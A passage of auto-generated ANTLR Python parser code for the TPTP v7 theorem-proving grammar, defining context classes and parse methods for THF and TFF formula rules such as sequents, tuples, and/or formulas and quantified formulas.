def thf_unitary_type(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_unitary_typeContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_typeContext,i)
def Star(self):
return self.getToken(tptp_v7_0_0_0Parser.Star, 0)
def thf_xprod_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_xprod_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_xprod_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_xprod_type" ):
listener.enterThf_xprod_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_xprod_type" ):
listener.exitThf_xprod_type(self)
def thf_xprod_type(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Thf_xprod_typeContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 84
self.enterRecursionRule(localctx, 84, self.RULE_thf_xprod_type, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 699
self.thf_unitary_type()
self.state = 700
self.match(tptp_v7_0_0_0Parser.Star)
self.state = 701
self.thf_unitary_type()
self._ctx.stop = self._input.LT(-1)
self.state = 708
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,28,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Thf_xprod_typeContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_thf_xprod_type)
self.state = 703
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 704
self.match(tptp_v7_0_0_0Parser.Star)
self.state = 705
self.thf_unitary_type()
self.state = 710
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,28,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Thf_union_typeContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_unitary_type(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_unitary_typeContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_unitary_typeContext,i)
def Plus(self):
return self.getToken(tptp_v7_0_0_0Parser.Plus, 0)
def thf_union_type(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_union_typeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_union_type
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_union_type" ):
listener.enterThf_union_type(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_union_type" ):
listener.exitThf_union_type(self)
def thf_union_type(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Thf_union_typeContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 86
self.enterRecursionRule(localctx, 86, self.RULE_thf_union_type, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 712
self.thf_unitary_type()
self.state = 713
self.match(tptp_v7_0_0_0Parser.Plus)
self.state = 714
self.thf_unitary_type()
self._ctx.stop = self._input.LT(-1)
self.state = 721
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,29,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Thf_union_typeContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_thf_union_type)
self.state = 716
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 717
self.match(tptp_v7_0_0_0Parser.Plus)
self.state = 718
self.thf_unitary_type()
self.state = 723
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,29,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Thf_sequentContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_tuple(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_tupleContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_tupleContext,i)
def Gentzen_arrow(self):
return self.getToken(tptp_v7_0_0_0Parser.Gentzen_arrow, 0)
def thf_sequent(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_sequentContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_sequent
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_sequent" ):
listener.enterThf_sequent(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_sequent" ):
listener.exitThf_sequent(self)
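    # Rule thf_sequent: either "thf_tuple Gentzen_arrow thf_tuple", or a recursively nested
    # thf_sequent delimited by the anonymous tokens T__9/T__10 (most likely '(' and ')').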
def thf_sequent(self):
localctx = tptp_v7_0_0_0Parser.Thf_sequentContext(self, self._ctx, self.state)
self.enterRule(localctx, 88, self.RULE_thf_sequent)
try:
self.state = 732
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__11, tptp_v7_0_0_0Parser.T__16, tptp_v7_0_0_0Parser.T__17, tptp_v7_0_0_0Parser.T__18]:
self.enterOuterAlt(localctx, 1)
self.state = 724
self.thf_tuple()
self.state = 725
self.match(tptp_v7_0_0_0Parser.Gentzen_arrow)
self.state = 726
self.thf_tuple()
pass
elif token in [tptp_v7_0_0_0Parser.T__9]:
self.enterOuterAlt(localctx, 2)
self.state = 728
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 729
self.thf_sequent()
self.state = 730
self.match(tptp_v7_0_0_0Parser.T__10)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_tupleContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_formula_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_formula_listContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_tuple
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_tuple" ):
listener.enterThf_tuple(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_tuple" ):
listener.exitThf_tuple(self)
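    # Rule thf_tuple: four alternatives selected on the lookahead token: an empty-tuple
    # literal (T__16 or T__17), or a thf_formula_list wrapped in the delimiter pairs
    # T__11/T__12 or T__18/T__19 (most likely '[...]' and '{...}').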
def thf_tuple(self):
localctx = tptp_v7_0_0_0Parser.Thf_tupleContext(self, self._ctx, self.state)
self.enterRule(localctx, 90, self.RULE_thf_tuple)
try:
self.state = 744
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__16]:
self.enterOuterAlt(localctx, 1)
self.state = 734
self.match(tptp_v7_0_0_0Parser.T__16)
pass
elif token in [tptp_v7_0_0_0Parser.T__11]:
self.enterOuterAlt(localctx, 2)
self.state = 735
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 736
self.thf_formula_list()
self.state = 737
self.match(tptp_v7_0_0_0Parser.T__12)
pass
elif token in [tptp_v7_0_0_0Parser.T__17]:
self.enterOuterAlt(localctx, 3)
self.state = 739
self.match(tptp_v7_0_0_0Parser.T__17)
pass
elif token in [tptp_v7_0_0_0Parser.T__18]:
self.enterOuterAlt(localctx, 4)
self.state = 740
self.match(tptp_v7_0_0_0Parser.T__18)
self.state = 741
self.thf_formula_list()
self.state = 742
self.match(tptp_v7_0_0_0Parser.T__19)
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_formula_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_logic_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Thf_logic_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_logic_formulaContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_formula_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_formula_list" ):
listener.enterThf_formula_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_formula_list" ):
listener.exitThf_formula_list(self)
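    # Rule thf_formula_list: thf_logic_formula followed by zero or more
    # "T__1 thf_logic_formula" pairs (T__1 is the list separator, most likely ',').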
def thf_formula_list(self):
localctx = tptp_v7_0_0_0Parser.Thf_formula_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 92, self.RULE_thf_formula_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 746
self.thf_logic_formula()
self.state = 751
self._errHandler.sync(self)
_la = self._input.LA(1)
while _la==tptp_v7_0_0_0Parser.T__1:
self.state = 747
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 748
self.thf_logic_formula()
self.state = 753
self._errHandler.sync(self)
_la = self._input.LA(1)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tfx_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tfx_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tfx_logic_formulaContext,0)
def thf_sequent(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_sequentContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tfx_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTfx_formula" ):
listener.enterTfx_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTfx_formula" ):
listener.exitTfx_formula(self)
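    # Rule tfx_formula: either a tfx_logic_formula or a thf_sequent,
    # chosen by adaptive prediction (decision 33).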
def tfx_formula(self):
localctx = tptp_v7_0_0_0Parser.Tfx_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 94, self.RULE_tfx_formula)
try:
self.state = 756
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,33,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 754
self.tfx_logic_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 755
self.thf_sequent()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tfx_logic_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_logic_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tfx_logic_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTfx_logic_formula" ):
listener.enterTfx_logic_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTfx_logic_formula" ):
listener.exitTfx_logic_formula(self)
def tfx_logic_formula(self):
localctx = tptp_v7_0_0_0Parser.Tfx_logic_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 96, self.RULE_tfx_logic_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 758
self.thf_logic_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_logic_formulaContext,0)
def tff_typed_atom(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_typed_atomContext,0)
def tff_sequent(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_sequentContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_formula" ):
listener.enterTff_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_formula" ):
listener.exitTff_formula(self)
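    # Rule tff_formula: tff_logic_formula, tff_typed_atom, or tff_sequent,
    # chosen by adaptive prediction (decision 34).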
def tff_formula(self):
localctx = tptp_v7_0_0_0Parser.Tff_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 98, self.RULE_tff_formula)
try:
self.state = 763
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,34,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 760
self.tff_logic_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 761
self.tff_typed_atom()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 762
self.tff_sequent()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_logic_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_binary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_binary_formulaContext,0)
def tff_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_unitary_formulaContext,0)
def tff_subtype(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_subtypeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_logic_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_logic_formula" ):
listener.enterTff_logic_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_logic_formula" ):
listener.exitTff_logic_formula(self)
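    # Rule tff_logic_formula: tff_binary_formula, tff_unitary_formula, or tff_subtype.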
def tff_logic_formula(self):
localctx = tptp_v7_0_0_0Parser.Tff_logic_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 100, self.RULE_tff_logic_formula)
try:
self.state = 768
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,35,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 765
self.tff_binary_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 766
self.tff_unitary_formula()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 767
self.tff_subtype()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_binary_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_binary_nonassoc(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_binary_nonassocContext,0)
def tff_binary_assoc(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_binary_assocContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_binary_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_binary_formula" ):
listener.enterTff_binary_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_binary_formula" ):
listener.exitTff_binary_formula(self)
def tff_binary_formula(self):
localctx = tptp_v7_0_0_0Parser.Tff_binary_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 102, self.RULE_tff_binary_formula)
try:
self.state = 772
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,36,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 770
self.tff_binary_nonassoc()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 771
self.tff_binary_assoc()
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_binary_nonassocContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_unitary_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tff_unitary_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_unitary_formulaContext,i)
def binary_connective(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Binary_connectiveContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_binary_nonassoc
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_binary_nonassoc" ):
listener.enterTff_binary_nonassoc(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_binary_nonassoc" ):
listener.exitTff_binary_nonassoc(self)
def tff_binary_nonassoc(self):
localctx = tptp_v7_0_0_0Parser.Tff_binary_nonassocContext(self, self._ctx, self.state)
self.enterRule(localctx, 104, self.RULE_tff_binary_nonassoc)
try:
self.enterOuterAlt(localctx, 1)
self.state = 774
self.tff_unitary_formula()
self.state = 775
self.binary_connective()
self.state = 776
self.tff_unitary_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_binary_assocContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_or_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_or_formulaContext,0)
def tff_and_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_and_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_binary_assoc
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_binary_assoc" ):
listener.enterTff_binary_assoc(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_binary_assoc" ):
listener.exitTff_binary_assoc(self)
def tff_binary_assoc(self):
localctx = tptp_v7_0_0_0Parser.Tff_binary_assocContext(self, self._ctx, self.state)
self.enterRule(localctx, 106, self.RULE_tff_binary_assoc)
try:
self.state = 780
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,37,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 778
self.tff_or_formula(0)
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 779
self.tff_and_formula(0)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_or_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_unitary_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tff_unitary_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_unitary_formulaContext,i)
def Or(self):
return self.getToken(tptp_v7_0_0_0Parser.Or, 0)
def tff_or_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_or_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_or_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_or_formula" ):
listener.enterTff_or_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_or_formula" ):
listener.exitTff_or_formula(self)
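    # Rule tff_or_formula: tff_unitary_formula Or tff_unitary_formula, then zero or more
    # further "Or tff_unitary_formula" repetitions (ANTLR left-recursion via enterRecursionRule).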
def tff_or_formula(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Tff_or_formulaContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 108
self.enterRecursionRule(localctx, 108, self.RULE_tff_or_formula, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 783
self.tff_unitary_formula()
self.state = 784
self.match(tptp_v7_0_0_0Parser.Or)
self.state = 785
self.tff_unitary_formula()
self._ctx.stop = self._input.LT(-1)
self.state = 792
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,38,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Tff_or_formulaContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_tff_or_formula)
self.state = 787
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 788
self.match(tptp_v7_0_0_0Parser.Or)
self.state = 789
self.tff_unitary_formula()
self.state = 794
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,38,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Tff_and_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_unitary_formula(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tff_unitary_formulaContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_unitary_formulaContext,i)
def And(self):
return self.getToken(tptp_v7_0_0_0Parser.And, 0)
def tff_and_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_and_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_and_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_and_formula" ):
listener.enterTff_and_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_and_formula" ):
listener.exitTff_and_formula(self)
def tff_and_formula(self, _p:int=0):
_parentctx = self._ctx
_parentState = self.state
localctx = tptp_v7_0_0_0Parser.Tff_and_formulaContext(self, self._ctx, _parentState)
_prevctx = localctx
_startState = 110
self.enterRecursionRule(localctx, 110, self.RULE_tff_and_formula, _p)
try:
self.enterOuterAlt(localctx, 1)
self.state = 796
self.tff_unitary_formula()
self.state = 797
self.match(tptp_v7_0_0_0Parser.And)
self.state = 798
self.tff_unitary_formula()
self._ctx.stop = self._input.LT(-1)
self.state = 805
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,39,self._ctx)
while _alt!=2 and _alt!=ATN.INVALID_ALT_NUMBER:
if _alt==1:
if self._parseListeners is not None:
self.triggerExitRuleEvent()
_prevctx = localctx
localctx = tptp_v7_0_0_0Parser.Tff_and_formulaContext(self, _parentctx, _parentState)
self.pushNewRecursionContext(localctx, _startState, self.RULE_tff_and_formula)
self.state = 800
if not self.precpred(self._ctx, 1):
from antlr4.error.Errors import FailedPredicateException
raise FailedPredicateException(self, "self.precpred(self._ctx, 1)")
self.state = 801
self.match(tptp_v7_0_0_0Parser.And)
self.state = 802
self.tff_unitary_formula()
self.state = 807
self._errHandler.sync(self)
_alt = self._interp.adaptivePredict(self._input,39,self._ctx)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.unrollRecursionContexts(_parentctx)
return localctx
class Tff_unitary_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_quantified_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_quantified_formulaContext,0)
def tff_unary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_unary_formulaContext,0)
def tff_atomic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_atomic_formulaContext,0)
def tff_conditional(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_conditionalContext,0)
def tff_let(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_letContext,0)
def tff_logic_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_logic_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_unitary_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_unitary_formula" ):
listener.enterTff_unitary_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_unitary_formula" ):
listener.exitTff_unitary_formula(self)
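    # Rule tff_unitary_formula: tff_quantified_formula, tff_unary_formula, tff_atomic_formula,
    # tff_conditional, tff_let, or a tff_logic_formula wrapped in T__9/T__10 (most likely parentheses).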
def tff_unitary_formula(self):
localctx = tptp_v7_0_0_0Parser.Tff_unitary_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 112, self.RULE_tff_unitary_formula)
try:
self.state = 817
self._errHandler.sync(self)
la_ = self._interp.adaptivePredict(self._input,40,self._ctx)
if la_ == 1:
self.enterOuterAlt(localctx, 1)
self.state = 808
self.tff_quantified_formula()
pass
elif la_ == 2:
self.enterOuterAlt(localctx, 2)
self.state = 809
self.tff_unary_formula()
pass
elif la_ == 3:
self.enterOuterAlt(localctx, 3)
self.state = 810
self.tff_atomic_formula()
pass
elif la_ == 4:
self.enterOuterAlt(localctx, 4)
self.state = 811
self.tff_conditional()
pass
elif la_ == 5:
self.enterOuterAlt(localctx, 5)
self.state = 812
self.tff_let()
pass
elif la_ == 6:
self.enterOuterAlt(localctx, 6)
self.state = 813
self.match(tptp_v7_0_0_0Parser.T__9)
self.state = 814
self.tff_logic_formula()
self.state = 815
self.match(tptp_v7_0_0_0Parser.T__10)
pass
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_quantified_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_quantifier(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_quantifierContext,0)
def tff_variable_list(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_variable_listContext,0)
def tff_unitary_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_unitary_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_quantified_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_quantified_formula" ):
listener.enterTff_quantified_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_quantified_formula" ):
listener.exitTff_quantified_formula(self)
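    # Rule tff_quantified_formula: fof_quantifier, then a tff_variable_list wrapped in
    # T__11/T__12 (most likely '[' and ']'), then T__13 (most likely ':') and a tff_unitary_formula.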
def tff_quantified_formula(self):
localctx = tptp_v7_0_0_0Parser.Tff_quantified_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 114, self.RULE_tff_quantified_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 819
self.fof_quantifier()
self.state = 820
self.match(tptp_v7_0_0_0Parser.T__11)
self.state = 821
self.tff_variable_list()
self.state = 822
self.match(tptp_v7_0_0_0Parser.T__12)
self.state = 823
self.match(tptp_v7_0_0_0Parser.T__13)
self.state = 824
self.tff_unitary_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tff_variable_listContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def tff_variable(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tff_variableContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_variableContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tff_variable_list
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTff_variable_list" ):
listener.enterTff_variable_list(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTff_variable_list" ):
listener.exitTff_variable_list(self)
def tff_variable_list(self):
localctx = tptp_v7_0_0_0Parser.Tff_variable_listContext(self, self._ctx, self.state)
self.enterRule(localctx, 116, self.RULE_tff_variable_list)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 826
